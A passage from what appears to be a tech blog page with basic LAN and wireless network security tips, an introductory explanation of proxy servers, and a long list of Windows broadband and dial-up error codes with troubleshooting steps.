As far as manual security is concerned, it takes into consideration pendrive, CD, DVD,etc. Ensure that these stuffs you are going to insert are pre scanned and does not contain any viruses. This can harm your entire network. Secondly do not allow any of your friend to take an access of your server, or do not revel any passwords that you have set for firewalls and your TCP ports. This could take away your entire privacy. With tools security play a most important part in LAN security.  Tools like Port Monitors & Trojan Cleaners should be given a big existence in LAN security.Port monitors are programs that you install on your computer.   They are simpler than the Personal Firewalls in that their main purpose is to detect incoming port scans on your computers.  Some also shut down an unauthorized scan, but for that capability you usually need to use a firewall. Trojan cleaners  look for Back Orifice and NetBus. Two common and most important tools
are specially meant to have a look on the TCP and UDP ports. This look after the attack on the system over internet.A total of 50 ports can be looked after at the same time.

Secure your Wireless network


In my previous article i showed you the tricks and techniques to protect your LAN connection. In this article i will show you how to secure your Wireless LAN. As in the previous article LAN security was sub divided into two parts, similarly Wireless LAN security is also divided into two parts. The difference is in the security issues.With Wireless Networking, no cables or wires are needed to network your computers and share your Internet connection. Wi-Fi connects computers, printers, video camera’s and game consoles into a fast Ethernet network via microwaves.
Following actions should be taken.
  • The most important thing is to change the default password of your access point.
  • Firmware and the drivers of your wireless access point and wireless adapters should be up to date. They should be updates whenever necessary.
  • There should be a combination of high level encryption and decent keys (WPA2/802.11i ) recommended.
  • Wireless users should be authenticated with different protocols like 802.1X, RADIUS, EAP (including EAP-PAX, EAP-PSK, EAP-TLS, EAP-TTLS, EAP-FAST, EAP-POTP, EAP-IKEv2, EAP-GPSK, PEAP, and EAP-SIM.
  • The above protocols give credentials including certificates, usernames, passwords etc.
  • Use Wireless LAN Security Tools for securing the wireless network. This software is specifically designed for securing 802.11 wireless networks.
  • Use a proxy for outgoing requests.
  • Always check the security of the wireless LAN using recent tools like Airbase, AirCrack-ng etc.
  • Make strict system logging on all the devices, do check your wireless log files regularly.

What is a proxy server? When do we need one?

Latin word proximus which means “close”.A proxy is actually a server which helps us maintaining our privacy on the Internet. It is just like a wall between you and the Internet. When you use a proxy, the webpage on the other side won’t be able to see you, webpage interacts with the proxy and proxy in return shows us the webpage. In this way a proxy server works.


A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server evaluates the request according to its filtering rules.
For example, it may filter traffic by IP address or protocol. If the request is validated by the filter, the proxy provides the resource by connecting to the relevant server and requesting the service on behalf of the client. A proxy server may optionally alter the client’s request or the server’s response, and sometimes it may serve the request without contacting the specified server.
A proxy server can be used for various purposes such as :
  • Hiding machine or other servers from public. It provides security.
  • To speed up access to resources (using caching). Web proxies are commonly used to cache web pages from a web server.
  • To open blocked sites in college schools and some times in offices.
  • To bypass security/ parental controls.
  • To protect your real identity on internet.
A proxy server that passes requests and replies unmodified is usually called a gateway or sometimes tunneling proxy.A proxy server can be placed in the user’s local computer or at various points between the user and the destination servers on the Internet.
A reverse proxy is (usually) an Internet-facing proxy used as a front-end to control and protect access to a server on a private network, commonly also performing tasks such as load-balancing, authentication, decryption or caching.
It was all general about proxies. In my next article i will discuss how to use online proxies and using proxy along with your browser. I will discuss how to configure proxy with either Internet Explorer  or Mozilla firefox. If you want me to discuss how to configure proxy in browser you use, you can leave browser name in comments. I will discuss proxy configuration in that browser which will receive maximum votes.

Broad Band Error Codes and Solution

error for broadband
error for broadband

Broad Band Error Codes and Solution

If you are customer of broadband you must have experienced these or at least some of these errors at least once in your system
and then you keep scratching your head that what the hell went wrong when you were doing every thing according to the manual.
Well then its time for you to shampoo you scalp and stop scratching it cause here are those common errors and there solutions too.

1) Possible solution / fix for error 619

Broadband error 619 – The port is disconnected
Possible solution for error 619: Restart your computer and wait until all applications have completely loaded before
trying to reconnect. Check your modem and phone cables are connected securely. If your problem has still not been
resolved uninstall and reinstall your Broadband modem.
Error 619: The port is disconnected – Error 619 often occurs when another application / process requires the same port as
being used by the broadband / internet modem. In particular, fax software is often associated with error 619. Should you
encounter error 619 whilst using fax software – disable the fax software and reboot. The quick / common fix for Error 619
is to shut down / reboot, thus forcing the offending port to close.
To fix error 619, try the following steps:
1. Restart / reboot PC. Wait until all applications have loaded before reconnecting.
2. Check all modem, phone cables and filters.
3. If error 619 persists – uninstall and reinstall your Broadband modem. Sometimes, error 619 can be caused where old
ISP modem software is conflicting with newer modem software. Therefore, ensure that any old software is removed and
retest the connection.

2) Possible solution / fix for error 629

Error 629 – The port was disconnected by the remote machine
Possible solution for error 629: Restart your computer and wait until all applications have completely loaded before
trying to reconnect. Recreate the Dial Up Connection. If your problem has still not been resolved uninstall and reinstall
your Broadband modem.
Error 629 – further information
Error 629 generally means that the remote computer (ISP) is closing / disconnecting the port. This might be due to
incorrect connection settings such as incorrect username and / or password. Having checked these settings, if error 629
persists, it would be wise to check ISP server status for any server outages or other ISP related problems.
Having checked connection settings, ISP server status – the next step would be to check all modem connections, cables
and broadband filters – followed by a PC and modem reboot. If Error 629 has still not cleared, you may wish to revert to
either local or ISP technical support…or google error 629 to see what the forums have to offer.
One such listing details the causes of Error 629 as follows:
The modem driver is corrupt
The DUN connection is dialling an invalid access number
The modem is not attempting a compatible connection
Authentication failure (invalid username or password)
Invalid or corrupt DUN connection settings
And if you have anything further to offer regarding Error 629 – please do not hesitate to get in touch.

3) Broadband error code 631

Error 631 – The port was disconnected by the user
With error 631, the user disconnected themselves – there is usually no fix required – just connect again. Error 631 is
usually a one-off glitch, caused when connection is interrupted by the user or another program on the PC.
Possible solution / fix for error 631
Possible solution for error 631
Error 631 is usually a one-off error which happens when the connection is interrupted by the user or another program on
the PC. In order to resolve Error 631, all that is usually required is a restart and to wait until all applications have
completely loaded before trying to reconnect. Recreate the connection and usually – no more error 631.
In some circumstances, Error 631 can be caused by incorrect connection settings or by using the wrong modem or
modem software. If a simple restart does not fix your error 631, check that the modem is correctly installed and
connected, whilst ensuring that any old modem software has been uninstalled. If error 631 persists, technical support
might be required or a google for error 631 to see if the forums have anything to offer.

4)Broadband error code 633

Error 633 – The port is already in use or is not configured for Remote Access
Possible solution / fix for error 633
Possible solution for error 633
Error 633 – The port is already in use or is not configured for Remote Access dialout
Error 633 is similar to Error 619 error and is often caused by other applications attempting to use the broadband modem,
incorrect connection settings and sometimes a corrupt modem driver.
Error 633 can usually be resolved with a PC restart. This works 50% of the time. Failing this, error 633 might require best
the user to disable any Firewall Software. Try to connect again. Recreate the connection and finally, try uninstalling and
reinstalling the Modem.

5) Broadband error code 645

Error 645 – Internal authentication error
Possible solution for error 645
This problem tends to occur with users of Windows 98 or Windows ME and can often be resolved via the following steps:
Recreate the Connection.
Windows 95/98 – This error can occur if the Require encrypted password option is enabled
on the Server Types tab in the connection’s properties, or an incorrect user name or password have been entered.
All versions of Windows – This error can occur if you are
attempting to connect to a Windows 2000 domain that has had a RRAS (Routing and Remote Access Services) server log
on without administrative privileges

6) Broadband error code 650

Error 650 – The Remote Access server is not responding
Error 650 can occur if the ISP server modem/equipment is not set up properly.
Possible solution / fix for error 650
Possible solution for error 650
The most likely reason for one of the above errors is a Network Problem. Consider the following steps:
. After receiving
this error wait 15 minutes and then restart your computer. Once it has restarted wait until all applications have
completely loaded before trying to reconnect.
. If you receive the same error, check with your service provider for
Network Outages. You may need to be patient.
If there are no network outages, the problem may originate from your
computer. In this case recreate your connection and if this fails to resolve the problem, uninstall and reinstall your
Broadband modem.

7) Broadband error code 651

Error 651 – Your modem (or other connecting device) has reported an error
Possible solution / fix for error 651
Error 651 – Your modem (or other connecting device) has reported an error.
Error 651 usually points to a driver error or modem hardware failure. To resolve Error 651, first ensure that the modem is
correctly connected to the PC and telephone line, with all points covered with broadband filters. Ensure that full
connectivity is indicated on the modem. Having checked these things – restart. If this does not resolve the error 651, go
through an uninstall and reinstall of the modem software. Thereafter, if Error 651 persists, it’s possible that the modem is
faulty. If the modem is the USB variety, try connecting to a different USB port on the PC or another PC entirely to confirm
that it is not a problem with USB port. If Error 651 still persists, technical support is indicated.

8) Possible solution / fix for error 678

Broadband error 678 – There is no answer
Error 678 is usually associated with Windows XP and can normally be resolved by restarting and waiting until all
applications have completely loaded before trying to reconnect. Although ADSL modems do not dial to connect to the
internet, error 678 – no answer – can still occur and sometimes results because there is an invalid number entered for the
computer to dial.
The following steps are often indicated to fix Error 678:
Click on the Start Menu and then select Run.
In the box which appears type the word command in order to open the command prompt and then click OK.
In the black command prompt window, type netsh interface ip reset log.txt and click on Enter on your keyboard.
Then type exit into the command prompt and then click on Enter on your keyboard.
Now restart your computer and reconnect to the Internet.

9) Possible solution / fix for error 691

Broadband error 691 – Access denied because username and/or
password is invalid on the domain

With all Windows versions – Error 691 can occur if you use a bad username or password; remember in most instances the
password is case-sensitive – you will not see the password, so if CAPS LOCK is not the way you expect it, you may have a
problem with upper/lower-case. It may also occur if there is a problem with your service provider’s access equipment, or
on a ‘bad’ connection where the modem is retraining. Can also occur with incorrect Connectoid settings.
If you get error 691 with a new account – you may not be using the correct username and/or password. Verify with your
provider exactly what you need for your username and password.

10)Possible solution / fix for error 718

Broadband error 718 – PPP timeout
Error 718 indicates a PPP conversation was started, but was terminated because the remote server did not respond within
an appropriate time. This can be caused by poor line quality or a problem with the server (ISP). This error can occur
when your modem has connected to the ISP and has sent username and password, but there is no response from the
server. Sometimes, re-dialing will be successful.Error 718 can also occur if your ISP account has expired, or if the username or password you are using is invalid. Error
718 can occur if you have LCP extensions enabled in the TCP/IP Properties of the connectoid and your ISP does not
support LCP extensions.
Error 718 may also occur if you have one or more network cards in your machine, and the cards do not have TCP/IP
protocol enabled, or if the TCP/IP settings are incorrect. (Go to Networking in Control Panel to examine the properties of
your network adapters; or, if you are not using the network card(s), disable them in Control Panel->System->Hardware.)

11) Broadband error 721 – Remote PPP peer is not responding

Possible solution / fix for error 721
Make sure your line is working by testing for a dial tone on your phone. Unplug, reboot and plug in again to ensure the
driver has loaded. If there’s still no joy, don’t discount the possibility of a faulty modem.
More about Error 721
Error 721 generally means that there is a problem with the remote PPP – the PPP server resides with the Internet /
broadband provider and is the computer at ‘the other end of the line’ that establishes connections to the Internet. The
majority of Error 721 messages are caused by a ‘problem’ with the Internet service provider. Most Internet service
providers have a number that can be called to check their service status. With Error 721 problems, it is therefore worth
checking the ISP’s service status before checking other possible causes.
Another possible cause of Error 721 messages can be displaced modem connections, adsl cables and / or broadband
filters. If an Error 721 message has not been caused by the ISP, it would be prudent to check all such connections.
Common advice is then to shut down both modem and PC and to wait 5-10 minutes before restarting them. Wait until all
PC application have fully loaded before attempting to reconnect to the Internet.
Where there are no ISP service issues and all modems, filters, cables are correctly connected – another possible Error 721
fix would be to check all associated PC settings and to update / uninstall modem drivers, reboot and reinstall them again
and whilst doing so – take care not to connect the modem until prompted to do so by the setup program.
Where no fix is found for Error 721, if time allows – wait 24 hours and try again or seek either local or ISP technical
support. You might also be advised to google for error 721 as there is a wealth of information available via the various
forums and blogs.
And should you have anything to add or offer regarding error 721, please do not hesitate to contact us.

12) Possible solution / fix for error 797

Possible solution for error 797
Restart your computer and wait until all applications have completely loaded before trying to reconnect.
If your problem has still not been resolved uninstall and reinstall your Broadband modem.

13) Broadband error 680 – No dial tone

Possible solution / fix for error 680
Error 680 usually means there is a problem receiving the Broadband signal at your modem.
Error 680 (no dial tone) has a great many potential causes. The best way to resolve Error 680 is to work logically to rule
out each potential cause. The first consideration is to know if the broadband connection is actually live. Installing modem
and modem software can result in Error 680 if the ‘go-live’ date has yet to be reached. The next ‘fault find’ is to ensure
that the modem is connected to the telephone master socket, whilst ensuring that all extension cables, phone splitters
and all other devices have been removed. Disconnect faxes, alarms and Sky TV (if connected) and once removed,
attempt a broadband connection direct via the telephone master socket (ensuring that a broadband microfilter is being
used. If Error 680 persists, try using a replacement microfilter (sometimes a cause of error 680). The next thing to
consider with Error 680 is electrical interference from cordless / digital phones and any other potential sources of
electrical energy. Having ruled out all of these potential causes, one remaining consideration would be to update the
modem drivers, which in most cases can be obtained from the manufacturers website.
If after these steps, Error 680 persists, technical support would be the next course of action.

OTHER ERROR CODE :

600 An operation is pending.
601 The port handle is invalid.
602 The port is already open.
603 Caller’s buffer is too small.
604 Wrong information specified.
605 Cannot set port information.
606 The port is not connected.
607 The event is invalid.
608 The device does not exist.
609 The device type does not exist.
610 The buffer is invalid.
611 The route is not available.
612 The route is not allocated.
613 Invalid compression specified.
614 Out of buffers.
615 The port was not found.
616 An asynchronous request is pending.
617 The port or device is already disconnecting.
618 The port is not open.
619 The port is disconnected.
620 There are no endpoints.
621 Cannot open the phone book file.
622 Cannot load the phone book file.
623 Cannot find the phone book entry.
624 Cannot write the phone book file.
625 Invalid information found in the phone book.
626 Cannot load a string.
627 Cannot find key.
628 The port was disconnected.
629 The port was disconnected by the remote machine.
630 The port was disconnected due to hardware failure.
631 The port was disconnected by the user.
632 The structure size is incorrect.
633 The port is already in use or is not configured for Remote Access dialout.
634 Cannot register your computer on the remote network.
635 Unknown error.
636 The wrong device is attached to the port.
637 The string could not be converted.
638 The request has timed out.
639 No asynchronous net available.
640 A NetBIOS error has occurred.
641 The server cannot allocate NetBIOS resources needed to support the client.
642 One of your NetBIOS names is already registered on the remote network.
643 A network adapter at the server failed.
644 You will not receive network message popups.
645 Internal authentication error.
646 The account is not permitted to log on at this time of day.
647 The account is disabled.
648 The password has expired.
649 The account does not have Remote Access permission.
650 The Remote Access server is not responding.
651 Your modem (or other connecting device) has reported an error.
652 Unrecognized response from the device.
653 A macro required by the device was not found in the device .INF file section.
654 A command or response in the device .INF file section refers to an undefined macro
655 The macro was not found in the device .INF file section.
656 The macro in the device .INF file section contains an undefined macro
657 The device .INF file could not be opened.
658 The device name in the device .INF or media .INI file is too long.
659 The media .INI file refers to an unknown device name.
660 The device .INF file contains no responses for the command.
661 The device .INF file is missing a command.
662 Attempted to set a macro not listed in device .INF file section.
663 The media .INI file refers to an unknown device type.
664 Cannot allocate memory.
665 The port is not configured for Remote Access.
666 Your modem (or other connecting device) is not functioning.
667 Cannot read the media .INI file.
668 The connection dropped.
669 The usage parameter in the media .INI file is invalid.
670 Cannot read the section name from the media .INI file.
671 Cannot read the device type from the media .INI file.
672 Cannot read the device name from the media .INI file.
673 Cannot read the usage from the media .INI file.
674 Cannot read the maximum connection BPS rate from the media .INI file.
675 Cannot read the maximum carrier BPS rate from the media .INI file.
676 The line is busy.
677 A person answered instead of a modem.
678 There is no answer.
679 Cannot detect carrier.
680 There is no dial tone.
681 General error reported by device.
682 ERROR WRITING SECTIONNAME
683 ERROR WRITING DEVICETYPE
684 ERROR WRITING DEVICENAME
685 ERROR WRITING MAXCONNECTBPS
686 ERROR WRITING MAXCARRIERBPS
687 ERROR WRITING USAGE
688 ERROR WRITING DEFAULTOFF
689 ERROR READING DEFAULTOFF
690 ERROR EMPTY INI FILE
691 Access denied because username and/or password is invalid on the domain.
692 Hardware failure in port or attached device.
693 ERROR NOT BINARY MACRO
694 ERROR DCB NOT FOUND
695 ERROR STATE MACHINES NOT STARTED
696 ERROR STATE MACHINES ALREADY STARTED
697 ERROR PARTIAL RESPONSE LOOPING
698 A response keyname in the device .INF file is not in the expected format.
699 The device response caused buffer overflow.
700 The expanded command in the device .INF file is too long.
701 The device moved to a BPS rate not supported by the COM driver.
702 Device response received when none expected.
703 ERROR INTERACTIVE MODE
704 ERROR BAD CALLBACK NUMBER
705 ERROR INVALID AUTH STATE
706 ERROR WRITING INITBPS
707 X.25 diagnostic indication.
708 The account has expired.
709 Error changing password on domain.
710 Serial overrun errors were detected while communicating with your modem.
711 RasMan initialization failure. Check the event log.
712 Biplex port is initializing. Wait a few seconds and redial.
713 No active ISDN lines are available.
714 Not enough ISDN channels are available to make the call.
715 Too many errors occurred because of poor phone line quality.
716 The Remote Access IP configuration is unusable.
717 No IP addresses are available in the static pool of Remote Access IP addresses.
718 PPP timeout.
719 PPP terminated by remote machine.
720 No PPP control protocols configured.
721 Remote PPP peer is not responding.
722 The PPP packet is invalid.
723 The phone number, including prefix and suffix, is too long.
724 The IPX protocol cannot dial-out on the port because the computer is an IPX router.
725 The IPX protocol cannot dial-in on the port because the IPX router is not installed..
726 The IPX protocol cannot be used for dial-out on more than one port at a time.
727 Cannot access TCPCFG.DLL.
728 Cannot find an IP adapter bound to Remote Access.
729 SLIP cannot be used unless the IP protocol is installed.
730 Computer registration is not complete.
731 The protocol is not configured.
732 The PPP negotiation is not converging.
733 The PPP control protocol for this network protocol is not available on the server.
734 The PPP link control protocol terminated..
735 The requested address was rejected by the server..
736 The remote computer terminated the control protocol.
737 Loopback detected..
738 The server did not assign an address.
739 The remote server cannot use the Windows NT encrypted password.
740 The TAPI devices configured for Remote Access failed to initialize or were not installed
correctly.
741 The local computer does not support encryption.
742 The remote server does not support encryption.
743 The remote server requires encryption.
744 Cannot use the IPX net number assigned by the remote server. Check the event log.
752 A syntax error was encountered while processing a script.